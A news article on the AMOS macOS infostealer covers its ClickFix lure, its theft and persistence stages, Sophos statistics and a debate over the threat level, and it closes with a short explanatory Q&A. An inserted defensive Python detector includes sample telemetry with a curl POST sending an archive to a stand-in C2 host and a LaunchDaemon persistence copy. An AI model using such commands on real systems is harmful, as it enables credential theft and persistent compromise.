AMOS macOS malware spreads via social engineering as security vendors debate actual threat level

No platform is immune to users who ignore basic security warnings
Security experts debate whether AMOS represents a genuine threat or simply exposes the oldest vulnerability in computing: human judgment.

A piece of malware called AMOS has risen to prominence not by breaking Apple's defenses, but by persuading people to break them on its behalf. Through a deceptively simple social engineering ruse, it convinces macOS users to paste a single terminal command — and from that moment of misplaced trust, it quietly harvests passwords, credentials, and cryptocurrency assets. That AMOS now accounts for nearly 40 percent of macOS threat responses in 2025 is less a story about software vulnerability than about the enduring fragility of human judgment in the face of convincing deception.

  • AMOS doesn't exploit Apple's code — it exploits human compliance, tricking users into typing a single terminal command that hands attackers the keys to their digital lives.
  • Once inside, the malware moves with alarming efficiency: capturing the system password, bypassing security warnings, draining the Keychain, stripping browser credentials, and even deploying fake crypto wallets to steal seed phrases.
  • The infection has spread through poisoned search results tied to ChatGPT and Grok queries, meaning ordinary curiosity has become a viable attack vector for unsuspecting users.
  • AMOS now accounts for nearly 40 percent of all macOS protection updates deployed by Sophos in 2025 — more than double any competing macOS threat — signaling a shift in the threat landscape toward manipulation over exploitation.
  • Security researchers are divided: some warn of a genuine epidemic, while others argue Apple's improving Gatekeeper and XProtect systems may soon neutralize AMOS entirely, leaving user awareness as the only meaningful battleground.

A malware family known as AMOS — short for Atomic macOS Stealer — has emerged as one of the most prevalent threats to Apple users, not by finding cracks in macOS itself, but by convincing people to open the door willingly. Using a ClickFix-style social engineering technique, it persuades victims to paste a single line of code into their Terminal. From there, the malware requests the user's system password, validates it locally, and begins a methodical harvest: Keychain passwords, Firefox and Chrome credentials, browser extension data, session tokens, and in some variants, fake cryptocurrency wallet apps designed to steal seed phrases.

The scale of the problem has drawn serious attention. Sophos MDR teams found that AMOS accounted for nearly 40 percent of all macOS protection updates deployed throughout 2025 — more than double the rate of any other macOS malware family. In just the final three months of that period, nearly half of all macOS stealer reports from Sophos customers involved AMOS or close variants. The malware-as-a-service operation has been active since at least April 2023, with campaigns spreading through poisoned search results tied to ChatGPT and Grok queries — a vector that weaponizes ordinary curiosity.

Technically, AMOS is disciplined. It checks for virtual machine environments to evade researchers, compresses stolen data using the native ditto utility, and transmits everything to attacker-controlled servers via curl. To survive reboots, it installs a LaunchDaemon that ensures persistent access long after the initial infection.

Yet not everyone agrees the alarm is proportionate. Critics note that infostealers have plagued Windows systems for two decades, and that AMOS carries a fundamental weakness: it requires the user's active participation. Apple's continued improvements to Gatekeeper, XProtect, and notarization may soon make the malware obsolete. The deeper question the industry is wrestling with is whether AMOS represents a novel threat or simply a fresh reminder that user behavior — not software architecture — remains the most exploitable vulnerability of all.

A malware family called AMOS has become one of the most prevalent threats to macOS users, not because it exploits hidden flaws in Apple's operating system, but because it tricks people into running commands they shouldn't. The malware, also known as Atomic macOS Stealer, relies entirely on social engineering—a ClickFix-style ruse that convinces victims to paste a single line of code into their Terminal application. Once executed, the damage unfolds methodically: the malware asks for the user's system password, validates it locally, and stores it in a hidden file. From there, it downloads additional payloads designed to bypass macOS security warnings and begins harvesting everything of value—passwords from the Keychain, credentials from Firefox and Chrome, browser extension data, and session tokens. Some variants even deploy fake cryptocurrency wallet applications to steal seeds and login information.

The scale of AMOS infections has caught the attention of security researchers and vendors alike. Sophos MDR teams identified the ClickFix pattern in a recent incident and found that AMOS accounted for nearly 40 percent of all macOS protection updates the company deployed throughout 2025, more than double the detection rate of any other macOS malware family during that period. In the last three months alone, almost half of all macOS stealer reports from Sophos customers involved AMOS or closely related variants. The malware-as-a-service operation has been tracked since at least April 2023, with notable campaigns including a variant called SHAMOS that CrowdStrike documented in August 2025. In December 2025, Huntress researchers found infections spreading through poisoned search results related to ChatGPT and Grok conversations—a particularly insidious vector because users were simply looking for information.

Once the initial command executes and the password is captured, AMOS moves quickly to establish control. The malware checks whether it is running inside a virtual machine or sandbox by querying system profiler data for signs of QEMU, VMware, or KVM—a defensive measure that helps it avoid security researchers. It then proceeds to extract the macOS Keychain database, which contains passwords for countless accounts and services. Browser credentials from Firefox and Chrome are harvested next, along with extension storage files and local session tokens. All of this data is compressed into a single archive using the ditto utility and transmitted to attacker-controlled servers via curl POST requests. To ensure it survives a system restart, AMOS installs a LaunchDaemon that automatically executes the malware after every reboot, giving attackers persistent access to the compromised machine.
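The stages this paragraph and the shorter summary above walk through (system_profiler check, ditto archive, curl POST, LaunchDaemon install) are each routine on their own, so a defender catches the chain by correlating them. The following added example, not from the article, Sophos or any vendor, scores constructed process-execution events of the kind an EDR or the unified log supplies and alerts only when several stages appear in one session within a short window; the session ids, paths and hostnames are made up.

```python
import re
from dataclasses import dataclass
from datetime import datetime, timedelta

# One regex per stage, matched on a process command line. The hypervisor-name
# check is done by the malware on system_profiler output, so only the tool is keyed.
STAGES = {
    "vm_check": re.compile(r"\bsystem_profiler\b"),
    "archive": re.compile(r"\bditto\b.*\s-c\w*\b"),   # ditto -c creates an archive
    "exfil": re.compile(r"\bcurl\b.*(\s-X\s*POST\b|\s(-d|--data|-F|--form)\b)"),
    "persist": re.compile(r"/Library/LaunchDaemons/\S+\.plist"),
}

@dataclass(frozen=True)
class ProcEvent:
    ts: datetime
    session: str    # login / terminal session the process ran under
    cmdline: str
def classify(cmdline: str) -> set[str]:
    """Stage names a single command line matches (usually zero or one)."""
    return {name for name, rx in STAGES.items() if rx.search(cmdline)}
def detect(events, window=timedelta(minutes=10), min_stages=3):
    """Session -> sorted stage names for sessions where at least min_stages
    distinct stages occur within `window`. One stage alone never fires."""
    alerts, by_session = {}, {}
    for ev in events:
        by_session.setdefault(ev.session, []).append(ev)
    for session, evs in by_session.items():
        evs.sort(key=lambda e: e.ts)
        for i, first in enumerate(evs):          # sliding window from each event
            seen = set()
            for ev in evs[i:]:
                if ev.ts - first.ts > window:
                    break
                seen |= classify(ev.cmdline)
            if len(seen) >= min_stages:
                alerts[session] = sorted(seen)
                break
    return alerts
# Constructed telemetry: "tty-7" runs the whole chain in under a minute;
# "tty-2" is an admin using two of the same tools legitimately.
T0 = datetime(2025, 12, 1, 9, 0, 0)
SAMPLE_EVENTS = [
    ProcEvent(T0, "tty-7", "system_profiler SPHardwareDataType"),
    ProcEvent(T0 + timedelta(seconds=20), "tty-7", "ditto -c -k /Users/jdoe/.hidden /tmp/out.zip"),
    ProcEvent(T0 + timedelta(seconds=35), "tty-7", "curl -X POST -F f=@/tmp/out.zip http://c2.example.invalid/up"),
    ProcEvent(T0 + timedelta(seconds=50), "tty-7", "cp /tmp/x.plist /Library/LaunchDaemons/com.example.x.plist"),
    ProcEvent(T0 + timedelta(hours=1), "tty-2", "system_profiler SPSoftwareDataType"),
    ProcEvent(T0 + timedelta(hours=1, minutes=2), "tty-2", "curl -X POST -d '{}' https://api.example.invalid/ping"),
]
```

With the defaults only "tty-7" is reported; lowering `min_stages` to 2 also surfaces the admin session, which is the tuning trade-off a detection engineer would weigh against false positives.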

Yet security experts are divided on whether the threat level warrants the alarm. Some argue that vendors may be overstating AMOS's novelty, pointing out that infostealers have been targeting Windows systems for nearly two decades. The malware's fundamental weakness is also hard to ignore: it requires user consent. Someone must willingly paste and run a Terminal command, which creates a significant barrier that technically literate users might easily avoid. Apple, meanwhile, is not sitting idle. The company's ongoing improvements to Gatekeeper, XProtect, and notarization requirements could render AMOS largely ineffective within a few operating system updates. The real vulnerability, some researchers suggest, may not be in AMOS itself but in the uncomfortable reality that no platform is immune to users who ignore basic security warnings. The question facing the industry is whether the threat is genuinely unprecedented or simply a reminder that user behavior remains the weakest link in any security chain.

The real danger may lie less in AMOS itself and more in the uncomfortable truth that no platform is immune to users who ignore basic security warnings.
— Security researchers and analysts cited in the investigation
The Hearth Conversation
Another angle on the story
Inventor

Why does AMOS work so well if it requires users to manually run commands? That seems like it should be easy to avoid.

Model

It should be, in theory. But the social engineering is sophisticated. Someone sees a message about updating their system or fixing a problem, and they're told to paste a command. They trust the source, or they're in a hurry, or they don't understand what the command does. By the time they realize something is wrong, the malware already has their password.

Inventor

Once it has the password, what can't it access?

Model

Essentially everything. The Keychain holds passwords for email, banking, work systems. Browser credentials give access to social media, cloud storage, financial accounts. If someone uses cryptocurrency, the fake wallet apps steal the seed phrases—those are irreplaceable. The attacker now owns the victim's digital life.

Inventor

Is Apple doing anything about this?

Model

Yes. Gatekeeper and XProtect are getting stronger with each update. Notarization requirements make it harder to distribute malware. But those are technical defenses. They don't stop someone from running a command they were tricked into running.

Inventor

So the real problem is user behavior?

Model

It always has been. AMOS is just the current reminder of that. You can build the most secure system in the world, but if someone willingly hands over the keys, it doesn't matter.
